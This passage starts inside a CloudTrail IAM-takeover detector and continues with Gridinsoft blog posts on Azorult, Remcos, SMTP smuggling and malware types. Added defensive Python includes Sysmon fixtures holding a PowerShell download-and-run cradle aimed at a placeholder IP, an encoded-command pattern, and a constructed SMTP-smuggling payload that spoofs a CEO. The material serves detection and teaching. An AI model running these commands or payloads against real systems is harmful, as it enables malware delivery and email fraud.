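def detect_iam_takeover(events, window=timedelta(minutes=15)):
    """Alert when one principal creates a user, grants it AdministratorAccess and
    mints an access key for it within `window`, optionally preceded by an SES probe.

    Returns a list of alert dicts; an empty list means nothing matched.
    """
    events = sorted(events, key=_ts)
    by_actor = {}
    for ev in events:
        by_actor.setdefault(ev["userIdentity"]["arn"], []).append(ev)

    alerts = []
    for actor, evs in by_actor.items():
        for i, ev in enumerate(evs):
            if ev["eventName"] != "CreateUser":
                continue
            new_user = (ev.get("requestParameters") or {}).get("userName")
            start = _ts(ev)
            steps = {"CreateUser"}
            for later in evs[i + 1:]:
                if _ts(later) - start > window:
                    break
                rp = later.get("requestParameters") or {}
                if rp.get("userName") != new_user:
                    continue
                if later["eventName"] == "AttachUserPolicy" and rp.get("policyArn") == ADMIN_POLICY:
                    steps.add("AttachUserPolicy")
                elif later["eventName"] == "CreateAccessKey":
                    steps.add("CreateAccessKey")
            if steps != TAKEOVER_STEPS:
                continue
            # Did the same principal check SES sending limits shortly before?
            ses_probe = any(
                e["eventSource"] == "ses.amazonaws.com"
                and timedelta(0) <= start - _ts(e) <= window
                for e in evs
            )
            alerts.append({
                "actor": actor,
                "new_user": new_user,
                "source_ip": ev["sourceIPAddress"],
                "ses_probe_first": ses_probe,
                "when": ev["eventTime"],
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_iam_takeover(SAMPLE_EVENTS):
        print(alert)
```

Real CloudTrail log objects in S3 are gzipped JSON with the records under a top-level `Records` key, so the same function applies to `json.load(...)["Records"]`. The sequence on its own is rare enough in most accounts to page on; the SES probe is context rather than a requirement, which is why the alert reports it as a flag instead of conditioning on it.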

AzorUlt Stealer Is Back In Action, Uses Email Phishing
https://gridinsoft.com/blogs/azorult-stealer-back-in-action/
Published Tue, 16 Jan 2024 12:22:45 +0000

Cybersecurity experts have stumbled upon a new sample of the eight-year-old Azorult malware. This infostealer collects sensitive data and had been dormant since late 2021. But can the old dog keep up with new tricks?

Azorult Malware Resurfaces After 2 Years

Recent research into the cyber threat landscape has brought concerning news about the Azorult malware. First identified in 2016, it built quite a reputation back in the day; among its most notable campaigns was distribution alongside STOP/Djvu ransomware. Its activity had been declining since early 2020, and the activity curve went flat in late 2021.

Being a stealer from the mid-2010s, its original feature set reflected the times. Azorult specializes in stealing sensitive information: browsing history, cookies, and saved login credentials. Crypto wallets, session tokens and 2FA tokens were not a priority for stealers back then, although the resurfaced version does look for wallet data.

The resurfaced version brings more sophisticated and stealthy methods that could make it hard to detect. It uses a new infection chain and stages the entire payload in memory rather than on disk. Researchers came across shortcut (.lnk) files masquerading as PDF documents that eventually lead to an Azorult infection. The distribution vector is believed to be classic email phishing.

[Figure: malicious shortcut file]

What is Azorult Malware?

Azorult is an infostealer that harvests many data types, including credentials for applications and cryptocurrency wallets, from infected systems. It can also download and execute additional payloads, which increases its threat to compromised systems.

In its latest variant, Azorult uses process injection and "Living Off the Land" (LotL) techniques to evade detection by security tools. It is primarily sold on Russian underground hacker forums, and data stolen with Azorult is sold on Russian Dark Web marketplaces. Beyond plain credential theft, the malware also captured data for a service that sells ready-made virtual identities: as detailed a picture of the user's online behaviour as possible, including history of website visits, information about the operating system, browser, installed plugins, and so on.

In particular, researchers found that 90% of all digital footprints offered on the infamous Genesis Market were associated with Azorult. However, in February 2020, Google released a Chrome update that switched saved-password encryption to AES-256, which broke Azorult's ability to retrieve passwords from Chrome. As development of Azorult had been discontinued in 2018, this release was considered the "death" of Azorult, and it hurt Genesis Market's business as well.

Azorult Uses Email Spam and LNK Files

The reviewed Azorult sample, as mentioned above, came as an .lnk file disguised as a PDF document through the double-extension trick. A file named citibank_statement_dec_2023.lnk triggers a sequence of events that downloads and executes a JavaScript file from a remote server. The JavaScript file downloads two PowerShell scripts, one of which retrieves an executable file and starts a new thread to execute the injected code. The loader terminates if the user's language code matches specific codes linked to Russia, the most probable home region of its developers. The final payload is, of course, the Azorult infostealer.

[Figure: Azorult infection chain]

Upon execution, it generates a unique identifier for the victim, collects system information, and looks for crypto wallets. Azorult stops early if certain conditions are met: a specific mutex already exists, a file named "password.txt" is present on the Desktop, or the machine name or username matches a list of values, checks typical of analysis-environment detection. If any check returns true, the binary terminates. Otherwise it captures screenshots and harvests data from multiple applications; the data is compressed, encrypted, and sent to a remote server.

Safety Recommendations

Since human error is mostly to blame, the most important recommendation is to beware of phishing. The following points will help:

  • Unsolicited emails. Be skeptical of emails from unknown sources, especially those that request personal information or urge you to click a link.
  • Verify email sources. Before responding or clicking any link, verify the sender's address and make sure it is legitimate. Do not click links in emails that look suspicious or too good to be true.
  • Educate yourself. Stay informed about phishing methods and the scam techniques built on them.

Remcos RAT Targets South Korean Users Through Webhards
https://gridinsoft.com/blogs/remcos-rat-targets-south-korea-webhards/
Published: Mon, 15 Jan 2024 21:39:20 +0000

The post Remcos RAT Targets South Korean Users Through Webhards appeared first on Gridinsoft Blog.

The infamous Remcos RAT has reportedly started targeting South Korean users through files shared on the Webhards platform. By baiting users with cracked software and adult content, the attackers get a malicious script onto the machine, which in turn downloads and runs the remote access trojan.

Remcos RAT Uses Webhards to Spread

Recent research by the South Korean cybersecurity firm AhnLab describes a new Remcos RAT distribution campaign. The company names Webhards as this malware's channel of choice for reaching user devices. Webhards is a file-sharing platform popular among software pirates and people looking for free content. It has legitimate uses, though a number of analysts name it a popular malware source, along with torrents.

In the case of Remcos RAT, the attackers use "hot topics", either adult content or cracked versions of new games, to get the user to download the infected package. The post on the site then asks the user to run a Game.exe file present in the downloaded archive. Running that executable kicks off a chain of VBS scripts that download the final payload.

[Figure: ZIP archive with a cracked game containing the aforementioned Game.exe. Source: AhnLab]

Once downloaded, another set of scripts injects Remcos into a system process called ServiceModelReg.exe. This is a built-in .NET Framework console utility (the WCF service model registration tool) that normally runs only when the framework is installed or repaired and has no further use on a workstation, which makes it a convenient, inconspicuous host for injected code.
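Both chains described on this page, the Azorult one (shortcut to script to PowerShell to injected payload) and the Remcos one (Game.exe to VBS to ServiceModelReg.exe), leave a recognisable parent/child process trail even when the final payload never touches disk. As an added example (not AhnLab's detection logic, and not part of the original posts), the Python below evaluates a few such rules over process-creation events in the shape of Sysmon Event ID 1 and reconstructs the ancestry of each hit. The events are constructed for illustration: paths, command lines and the documentation address 203.0.113.7 are assumptions, and the rule names are mine.

```python
import re

# Constructed process-creation events in Sysmon Event ID 1 style, not real
# telemetry. Paths and command lines are assumptions for illustration.
EVENTS = [
    {"pid": 4101, "ppid": 912, "Image": r"C:\Windows\explorer.exe",
     "ParentImage": r"C:\Windows\System32\userinit.exe", "CommandLine": "explorer.exe"},
    # Azorult-style chain: the .lnk target fetches a JavaScript file and hands
    # it to wscript, which in turn launches an encoded PowerShell command.
    {"pid": 4202, "ppid": 4101,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'powershell.exe -w hidden -c "iwr http://203.0.113.7/s.js -o $env:TEMP\s.js; wscript $env:TEMP\s.js"'},
    {"pid": 4303, "ppid": 4202, "Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"wscript C:\Users\u\AppData\Local\Temp\s.js"},
    {"pid": 4404, "ppid": 4303,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgA"},  # 'IEX' in UTF-16LE base64
    # Remcos-style chain: Game.exe from the cracked-game archive runs a VBS
    # script, which starts ServiceModelReg.exe as the injection host.
    {"pid": 5001, "ppid": 4101, "Image": r"C:\Users\u\Downloads\Game\Game.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Users\u\Downloads\Game\Game.exe"'},
    {"pid": 5102, "ppid": 5001, "Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": r"C:\Users\u\Downloads\Game\Game.exe",
     "CommandLine": r"wscript.exe //B C:\Users\u\AppData\Local\Temp\a.vbs"},
    {"pid": 5203, "ppid": 5102,
     "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ServiceModelReg.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ServiceModelReg.exe"},
    # Benign: an administrator running PowerShell from Explorer.
    {"pid": 4505, "ppid": 4101,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -NoProfile -Command Get-ChildItem C:\Users"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# Download cradles and encoded-command switches commonly seen in loader stages.
DOWNLOAD_OR_DECODE = re.compile(
    r"\b(iwr|invoke-webrequest|downloadstring|downloadfile|iex|invoke-expression|frombase64string)\b"
    r"|-enc(odedcommand)?\b", re.I)
# Double-extension lures. Explorer never shows the .lnk extension, so the
# user sees 'statement.pdf' even with extensions enabled.
DISGUISED_EXT = re.compile(r"\.(pdf|docx?|xlsx?|jpe?g|png|txt)\.(lnk|js|vbs|scr|exe)$", re.I)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def is_disguised_file(name):
    return DISGUISED_EXT.search(name) is not None


def evaluate(events):
    """Return (pid, rule) pairs for every event that matches a rule."""
    findings = []
    for ev in events:
        image, parent, cmd = basename(ev["Image"]), basename(ev["ParentImage"]), ev["CommandLine"]
        if parent == "explorer.exe" and image in SHELLS | SCRIPT_HOSTS and DOWNLOAD_OR_DECODE.search(cmd):
            findings.append((ev["pid"], "explorer_shell_download"))      # shortcut lure stage
        if parent in SCRIPT_HOSTS and image in SHELLS:
            findings.append((ev["pid"], "script_host_spawns_shell"))      # JS/VBS stage
        if image == "servicemodelreg.exe" and parent in SCRIPT_HOSTS | SHELLS:
            findings.append((ev["pid"], "servicemodelreg_from_script_host"))  # injection host
    return findings


def ancestry(events, pid):
    """Walk ppid links back to the root and return the image names, root first."""
    by_pid = {e["pid"]: e for e in events}
    chain = []
    while pid in by_pid:
        chain.append(basename(by_pid[pid]["Image"]))
        pid = by_pid[pid]["ppid"]
    return list(reversed(chain))


if __name__ == "__main__":
    for pid, rule in evaluate(EVENTS):
        print(rule, pid, " > ".join(ancestry(EVENTS, pid)))
    print(is_disguised_file("statement.pdf.lnk"))
```

Process-creation events only show ServiceModelReg.exe being started by the script; the injection itself needs a different telemetry source (CreateRemoteThread or image-load events, or memory scanning), so treat the third rule as the trigger to go and look, not as proof of injection.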

What is Remcos RAT?

Remcos is a remote access trojan marketed as a legitimate remote access tool by the German firm BreakingSecurity. First sold in 2016, it became particularly popular in 2020 and 2021, when threat actors spread it through COVID-themed emails. Its activity has since become more moderate, averaging about 30 samples per day during 2023.

[Figure: Remcos RAT activity, 12/17/2023 to 01/15/2024]

Functionally, this malware is a classic RAT: Remcos gives the operator full remote access to the infected system, including system menus and the file system. It can also record the screen, take screenshots, and alert the operator when the victim becomes active. To tell infected systems apart, the malware collects basic information such as the OS version, date, time, and some hardware details.

How to protect against threats?

The way this malware spreads already tells you how to protect yourself. In the case of Remcos, the obvious answer is to avoid cracked software. Apart from being a malware risk it is also copyright infringement, so steering clear of it is strongly recommended, especially on websites known for distributing malware.

For an additional, passive layer of protection, keep anti-malware software running in the background. A modern, well-maintained antivirus will catch most of what slips past your own caution, regardless of the type of malware. GridinSoft Anti-Malware is one you can rely on: its detection system combines proactive and reactive approaches.

SMTP Smuggling is a New Threat to Email Security
https://gridinsoft.com/blogs/smtp-smuggling-technique/
Published: Fri, 05 Jan 2024 20:16:55 +0000

The post SMTP Smuggling is a New Threat to Email Security appeared first on Gridinsoft Blog.

A new technique called SMTP smuggling reportedly has the potential to bypass existing email security checks and lets attackers send spoofed emails from seemingly legitimate addresses. This may breathe new life into email spam, even though spam never really lost its effectiveness in the first place.

What is SMTP Smuggling?

SMTP smuggling is a novel exploitation technique that manipulates the Simple Mail Transfer Protocol (SMTP), the protocol used worldwide for sending email since the early days of the Internet. It takes advantage of differences in how outbound (sending) and inbound (receiving) SMTP servers interpret the end-of-data sequence. This allows attackers to insert arbitrary SMTP commands into a message and, as a result, send a separate, smuggled email.

[Figure: potential end-of-data sequence between START and END]

The core of SMTP smuggling lies in the discrepancies between how different servers handle the end-of-data sequence (<CR><LF>.<CR><LF>). If the outbound server only recognises the exact RFC sequence but the inbound server also accepts a variant such as <LF>.<CR><LF>, an attacker can break out of the message data on the receiving side and smuggle in unauthorized commands that the sending server passed through as ordinary text. The technique relies on the inbound server accepting a batch of SMTP commands in one go, i.e. SMTP pipelining, which most servers support today.

In-depth research into this vulnerability found that email services and products from Microsoft, GMX, and Cisco were susceptible. While Microsoft and GMX have addressed the issue, Cisco categorized the findings as a feature rather than a vulnerability and chose not to change the default configuration. Consequently, SMTP smuggling remains possible against Cisco Secure Email instances under default settings. The issue was subsequently also identified in Microsoft's Outlook SMTP server, further widening the exposure.

What is the danger of SMTP vulnerability?

The implications of SMTP smuggling are far-reaching. An attacker who can send mail through a vulnerable provider can smuggle a second message that appears to come from any address in that provider's domain. Because the smuggled message genuinely arrives from the provider's own servers, Sender Policy Framework (SPF) passes, and Domain-based Message Authentication, Reporting and Conformance (DMARC) passes on that aligned SPF result; the DomainKeys Identified Mail (DKIM) signature of the outer message does not cover the smuggled one, but DMARC only needs one aligned pass. Sender authentication therefore does not stop the forgery.

In practical terms, this trick lets fraudsters land spoofed mail in corporate inboxes that strict sender authentication had kept spam-free until now. Companies that enforce DMARC are most likely aware of the dangers and have other protections running, but the fact that this layer can be bypassed noticeably raises their risk of phishing and impersonation attacks.
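To make the mechanism concrete, here is an added simulation in Python (not the researchers' code and not part of the original post). It models a receiving server that accepts either only the RFC 5321 end-of-data sequence or the usual lenient variants, and a sending server that either forwards the DATA section untouched or normalizes bare line breaks and dot-stuffs it before relaying. The message, addresses and the sender.example/target.example domains are constructed for the demonstration.

```python
import re
from dataclasses import dataclass

# RFC 5321 end-of-data sequence: the only one a server should honour.
RFC_EOD = b"\r\n.\r\n"
# Sequences a lenient inbound server may also treat as end-of-data.
LENIENT_EODS = [RFC_EOD, b"\n.\r\n", b"\r\n.\n", b"\n.\n", b"\r.\r"]


@dataclass
class Message:
    mail_from: bytes
    rcpt_to: list
    body: bytes


def receive(stream, eod_markers):
    """Simulate an inbound server consuming a pipelined command stream.
    Commands are CRLF-terminated; after DATA the body runs up to the earliest
    occurrence of any marker in eod_markers. Dot-unstuffing is left out."""
    messages, pos = [], 0
    mail_from, rcpts = b"", []
    while pos < len(stream):
        end = stream.find(b"\r\n", pos)
        if end < 0:
            break
        line, pos = stream[pos:end], end + 2
        verb, _, arg = line.partition(b":")
        verb = verb.strip().upper()
        if verb == b"MAIL FROM":
            mail_from, rcpts = arg.strip(), []
        elif verb == b"RCPT TO":
            rcpts.append(arg.strip())
        elif verb == b"DATA":
            hits = [(stream.find(m, pos), m) for m in eod_markers]
            hits = [(i, m) for i, m in hits if i >= 0]
            idx, marker = min(hits) if hits else (len(stream), b"")
            messages.append(Message(mail_from, list(rcpts), stream[pos:idx]))
            pos = idx + len(marker)
        elif verb == b"QUIT":
            break
    return messages


def relay_untouched(body):
    """Vulnerable outbound behaviour: the provider reads DATA up to the RFC
    sequence and forwards it byte for byte, bare line feeds included."""
    return body


def relay_hardened(body):
    """Fixed outbound behaviour: turn bare CR or LF into CRLF, then dot-stuff
    (RFC 5321 section 4.5.2) so no body line downstream is a lone '.'."""
    normalized = re.sub(rb"\r\n|\r|\n", b"\r\n", body)
    lines = normalized.split(b"\r\n")
    return b"\r\n".join(b"." + ln if ln.startswith(b".") else ln for ln in lines)


# Constructed attacker message. The bare LF before the '.' is the whole trick:
# the outbound server sees ordinary body text, a lenient inbound server sees
# end-of-data and treats the rest as fresh commands from sender.example.
SMUGGLED_BODY = (
    b"From: user@sender.example\r\nTo: victim@target.example\r\n"
    b"Subject: hello\r\n\r\nInnocent text.\n.\r\n"
    b"MAIL FROM:<ceo@sender.example>\r\n"
    b"RCPT TO:<cfo@target.example>\r\n"
    b"DATA\r\n"
    b"From: ceo@sender.example\r\nTo: cfo@target.example\r\n"
    b"Subject: Urgent wire\r\n\r\nPay the attached invoice today."
)


def build_session(body):
    """The command stream the outbound provider sends on to target.example."""
    return (b"MAIL FROM:<user@sender.example>\r\n"
            b"RCPT TO:<victim@target.example>\r\n"
            b"DATA\r\n" + body + RFC_EOD + b"QUIT\r\n")


def demo():
    """Run all four sender/receiver combinations; values are (MAIL FROM, RCPT TO) lists."""
    results = {}
    for name, relay in (("untouched", relay_untouched), ("hardened", relay_hardened)):
        for policy, markers in (("strict", [RFC_EOD]), ("lenient", LENIENT_EODS)):
            msgs = receive(build_session(relay(SMUGGLED_BODY)), markers)
            results[(name, policy)] = [(m.mail_from, m.rcpt_to) for m in msgs]
    return results


if __name__ == "__main__":
    for key, msgs in demo().items():
        print(key, "->", len(msgs), "message(s):", msgs)
```

Only the untouched/lenient combination yields two messages, the second with MAIL FROM <ceo@sender.example> that the receiving side will attribute to the provider's IP. Either fix alone closes it: a strict receiver sees one message, and a hardened sender turns the bare-LF "." line into "..", which no receiver interprets as end-of-data.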

Mitigating the effects of vulnerability

To mitigate the risks posed by SMTP smuggling, experts recommend several measures. Cisco Secure Email administrators should change the CR and LF handling setting from its default "Clean" to "Allow": the default converts bare <CR> and <LF> into <CR><LF>, which is exactly what turns a smuggled sequence into a real end-of-data marker and lets the spoofed email pass DMARC. Operators of other mail servers should apply the vendor updates that make inbound servers reject bare <LF> or <CR> inside DATA and that make outbound servers normalize and dot-stuff message data before relaying. Beyond that, all email providers and users should keep their systems updated and stay informed about the latest security developments.

Regularly monitor for unusual server activity and review security logs to detect potential abuse. Educate users about phishing and encourage skepticism toward emails from unknown senders, including ones that appear to come from inside the company. Finally, consider consulting cybersecurity professionals for protective measures tailored to your infrastructure.

Seven Common Types of Malware – Analysis & Description
https://gridinsoft.com/blogs/seven-common-types-of-malware/
Published: Wed, 03 Jan 2024 12:44:40 +0000

The post Seven Common Types of Malware – Analysis & Description appeared first on Gridinsoft Blog.

In the intricate landscape of cybersecurity, comprehending the various forms of malware is crucial. This article offers an in-depth look at the most pervasive malware types, from Loaders to Keyloggers. We’ll explore their mechanisms, impacts, and how they compromise digital security, providing you with the knowledge to better safeguard against these ever-evolving cyber threats.

Let's start by understanding what malware is. Malware is malicious software that can harm your computer and data. Some potentially unwanted or malicious applications show no obvious signs of danger and are classified by anti-malware vendors based on their own criteria. Hack tools can also be considered malicious because they can be used to break into computer networks, and antivirus software often blocks them as if they were active viruses.

Loader

Loader malware, also known as a downloader or dropper, is malicious software designed to deliver other malware to the targeted system (strictly, a dropper carries its payload embedded while a downloader fetches it from a server, but the terms are used loosely). These loaders often have the capability to form botnets, networks of computers controlled from a single command center. Once active, such a botnet can deploy any kind of malware, from adware and browser hijackers to spyware and ransomware.

For a loader to work, it must first get onto the targeted system. Email spam is one of the most common ways of spreading it. Since this malware usually targets individual users rather than corporate networks, software cracks and adware are also used as delivery channels.


Loader (droppers) examples in 2024

  • Amadey
  • BatLoader
  • BazarLoader
  • TrickBot
  • QakBot

Stealer

Stealer malware, often referred to as “information stealers,” is a type of malicious software designed to extract sensitive information from infected systems. This information can include a wide range of data such as login credentials, financial information, personal identification details, and more.

Key Characteristics of Stealer Malware

  • Data extraction: stealers are programmed to find and exfiltrate specific types of data, such as passwords, browser history, cookies, system information, and files.
  • Stealthy operation: they run quietly in the background, trying to avoid detection by both users and security software.
  • Automated data transmission: once the desired information is gathered, it is sent to a command and control server run by the attacker.
  • Versatility: a stealer can be standalone malware or a module within larger, multi-functional malware.


Common Types of Stealer Malware

  • Password stealers: specifically designed to extract passwords stored on a computer or transmitted over a network.
  • Banking trojans: a type of stealer that specifically targets financial information, such as banking login credentials.
  • Keyloggers: capture and record keystrokes, letting attackers gather whatever the user types, including passwords and other sensitive information.
  • Browser session hijackers: extract data from web browsers, including session cookies, which allow attackers to impersonate the victim on websites without knowing the password.
  • Clipboard hijackers: monitor the system clipboard for sensitive information such as cryptocurrency wallet addresses.
  • Form grabbers: intercept data entered into web forms, often used to steal credit card details and login information.

Remote Access Trojan (RAT)

A Remote Access Trojan (RAT) is a type of malware that allows a hacker to control a victim’s computer remotely. This control is often comprehensive and can steal information, spy on the user’s activities, or distribute other malware. RATs are particularly dangerous because they provide the attacker with unauthorized access to the victim’s system, often without the user’s knowledge.


Characteristics of RATs

  • Remote control: the defining feature of a RAT is the attacker's ability to control the infected system remotely.
  • Stealthiness: RATs usually operate in stealth mode to avoid detection by users and antivirus programs.
  • Data exfiltration: they can be used to steal sensitive data, including passwords, financial information, and personal files.
  • System manipulation: they can alter system settings, modify files, and install additional software, including other malware.

RAT Malware Types

  • Generic RATs: provide broad remote control capabilities suitable for a variety of malicious activities.
  • Commercial RATs: marketed as legitimate remote administration tools, these are readily abused when they fall into the wrong hands. Examples include DarkComet and NetBus.
  • Custom RATs: created by attackers for specific campaigns, often used in targeted attacks and advanced persistent threats (APTs).
  • Banking RATs: specialized in financial fraud, designed to steal banking credentials and credit card information.
  • Mobile RATs: target mobile devices and can access messages, call logs, and other sensitive data stored on smartphones.

Ransomware

Ransomware is a malicious program that runs on your computer and encrypts your files. Once the files are encrypted, the attacker demands a ransom payment to restore access to your data. Some ransomware also threatens to delete your files or expose sensitive information if the ransom is not paid. The deletion threat is often a bluff, but the exposure threat can be real: modern ransomware operators usually exfiltrate data before encrypting it, and ransomware is frequently deployed alongside spyware or stealers.

Characteristics of Ransomware

  • Encryption: the most common tactic; the ransomware encrypts the victim's files, making them inaccessible without the decryption key.
  • Demand for ransom: victims are told to pay, usually in cryptocurrency, to receive the decryption key.
  • Time limits: many variants include a countdown timer and threaten to delete the key or raise the price if payment is not made in time.
  • Distribution methods: commonly spread through phishing emails, malicious downloads, and exploitation of software vulnerabilities.
  • Anonymity of transactions: ransoms are demanded in cryptocurrency to keep the attackers anonymous.

[Figure: ransomware attack stages]

Types of Ransomware

  • Crypto ransomware: encrypts valuable files on a computer or network. Example: WannaCry, which spread globally in 2017, encrypting files and demanding Bitcoin.
  • Locker ransomware: locks the victim out of the operating system, blocking access to the desktop, apps, and files. Example: the early "police-themed" ransomware that falsely claimed the user had committed a crime and had to pay a fine.
  • Scareware: fake security software that claims to have found problems on the computer and demands payment to fix them. Not true ransomware, but it uses the same intimidation tactics.
  • Doxware or leakware: threatens to publish sensitive data stolen from the victim's computer unless a ransom is paid.
  • RaaS (Ransomware-as-a-Service): the ransomware is built by a developer and distributed by affiliates who share a percentage of the proceeds with the developer. Example: REvil/Sodinokibi.
  • Double extortion ransomware: not only encrypts data but also steals it, with the threat of publishing it if the ransom is not paid. Example: Maze ransomware.
  • Mobile ransomware: specifically targets mobile devices, usually by locking the device or encrypting the files stored on it.

Trojan

A Trojan is malicious software that disguises itself as a legitimate program or file, tricking users into downloading and installing it (it is not a virus in the strict sense, since it does not replicate on its own). Once activated, a Trojan can perform a variety of harmful actions on the victim's computer. Trojans come as applications, documents, or scripts, and typically disable security software, modify system settings, and steal personal information. They are spread through deceptive methods such as phishing emails, fake software updates, or illegitimate tools.

Common Trojan Virus Types

  • Trojan-Downloader: disables security software such as Microsoft Defender, connects to a command server, and fetches other malware into the system, leaving it open to further attacks.
  • Trojan-Spy and Trojan-Stealer: designed to spy on the entire system or steal specific files or passwords. They can modify deep system settings to upload telemetry, giving attackers detailed information about the user's activities and system configuration.
  • Trojan-Ransom (ransomware): disguises itself as a legitimate application and encrypts the user's files, demanding a ransom for their decryption. It can disable security settings and block access to removal guides.
  • Trojan-CoinMiner: uses the victim's hardware for cryptocurrency mining, which can lead to hardware overload and failure.
  • Trojan with adware functions: bombards the user with ads and opens advertising pages on its own. These are often classified as potentially unwanted programs (PUPs).

Installer malware

Installer malware is unwanted software that disguises itself as a legitimate installation program for an application or update. These deceptive installers trick users into downloading and executing them because they look like trustworthy setup files. Once the user lets one run, it downloads and runs numerous unwanted programs. Such installers are commonly used to monetize free or cracked software.

Types of Installer Malware include

  • Bundled malware installers: come with legitimate software but also include hidden malicious programs, installing adware, spyware, or other unwanted software without the user's knowledge.
  • Fake software update installers: masquerade as updates for popular software but actually contain malware, exploiting the user's trust in the software and the routine nature of updates.
  • Drive-by download installers: downloaded to the user's system without consent when they visit a compromised or malicious website; the installation often happens silently.

Keylogger

A keylogger is a type of surveillance technology used to record keystrokes made by a user. The purpose of keyloggers can vary from benign to malicious, depending on their use. They are often used in corporate and legal environments to track employees’ and users’ activities for various reasons, such as security or compliance. However, in the context of malware, keyloggers are used to steal sensitive information like passwords, financial data, and personal messages.

[Figure: keylogger working scheme]

Types of Keyloggers

  • Hardware keyloggers: physical devices attached to a keyboard or embedded in hardware to capture keystrokes. They are hard to detect without physical inspection.
  • Software keyloggers: malicious software that records keystrokes, either as part of a larger malware package or as a standalone application. They are the more common kind and are installed via phishing, malicious downloads, or exploitation of system vulnerabilities.
  • Kernel-based keyloggers: operate at the kernel level of the operating system, which gives them privileged access to keystrokes and makes them hard to detect and able to bypass security software.
  • Browser keyloggers: capture keystrokes only inside web browsers and are used mainly to steal login credentials and financial information entered on websites.
  • API-based keyloggers: use operating system API calls to monitor and record keystrokes. They are common because they are easy to implement.
  • Form grabbing keyloggers: record form data submitted in web browsers, capturing it before the browser encrypts it for transmission to the website.

How can I protect my computer from malware?

Protecting your computer from malware involves a combination of software, safe computing habits, and regular maintenance. The basic measures are regular updates, strong passwords, secure networks, and limiting what software you install; on top of those, anti-malware tools are highly effective against the malware types described above.

You can be careful for a long time, but eventually you may end up downloading malware to your computer without realizing it. We recommend GridinSoft Anti-Malware, which can save you the stress and financial cost of fighting malware.

PUABundler:Win32/PiriformBundler
https://gridinsoft.com/blogs/puabundler-win32-piriformbundler/
Published: Fri, 29 Dec 2023 12:31:16 +0000

The post PUABundler:Win32/PiriformBundler appeared first on Gridinsoft Blog.

PUABundler:Win32/PiriformBundler is the detection of an unwanted program, developed and issued by Piriform Software. While applications from this developer aren’t inherently malicious, the bundled software they carry and their questionable behavior make them less than desirable.

What is PUABundler:Win32/PiriformBundler?

PiriformBundler is a detection name for unwanted software developed by Piriform. Microsoft assigns such names to groups of malware or unwanted software with common traits. For most families the shared trait is functionality or code; for PiriformBundler it is simply the developer.

But why are they unwanted? Major cybersecurity vendors, along with Microsoft, classify software bundles as unwanted, and Piriform used to monetize the free versions of its programs by bundling third-party software into the installers, which meets that definition.

Aside from that, Piriform software is not particularly effective. While it performs positive actions in the system, its overall effectiveness often falls short, bordering on a placebo effect.

Threat Summary

  • Threat name: PUABundler:Win32/PiriformBundler
  • Threat type: unwanted program
  • Effects: a Piriform program appears on your PC, possibly together with other unknown programs
  • Danger: unwanted program installation, low efficiency of the actual software
  • Mitigation: removal with GridinSoft Anti-Malware, or manual removal

To get a clearer picture of what PUABundler:Win32/PiriformBundler is, let's analyze one of the apps detected under this name and see what exactly makes it unpleasant.

PUABundler:Win32/PiriformBundler Analysis

Finding a sample for this analysis is straightforward – any program from the Piriform website will suffice. I chose Defraggler for this analysis, a disk defragmentation utility available in both free and paid versions.

Despite presenting itself as a defragmentation tool, the program's effectiveness is questionable. After two consecutive defragmentation runs it still reported about 9% fragmentation, an objective sign that it is not doing much.


Closer analysis shows that the program identifies fragmented files but takes no action on them, which raises doubts about its overall usefulness.

Is PiriformBundler Dangerous?

As the analysis shows, it is not dangerous the way malware is. Piriform software is not inherently harmful; its lack of effectiveness is what makes it undesirable, and it is most likely safe to keep on your PC.

If, however, you never installed it, or suspect it appeared without your consent, run a scan with GridinSoft Anti-Malware. It will uncover any malicious programs that may also be present in the system.

How to protect against PiriformBundler and unwanted programs?

It is not always easy to tell whether a program is legitimate. The Microsoft Defender notification is mostly informational: as you can see, being flagged as PUA does not mean the program is dangerous to use. Some such apps, though, can be genuinely harmful to run, whether because of malicious behaviour or simply poor design.

Using only reliable, well-reviewed sources weeds out the majority of unwanted programs. Forum advice or an advertisement on a shady website is not the place to find benign and effective software. If you expect a program to solve a problem, take the time to read user testimonials; the Internet remembers everything, and with a little persistence the truth about a product is not hard to find.

Have reliable anti-malware software running in the system. This will not only protect your system from malware intrusion but also help you understand whether the detected unwanted program is dangerous or not. Using GridinSoft Anti-Malware, you will also be protected from the newest threats and online fraud, thanks to its advanced scanning capabilities.
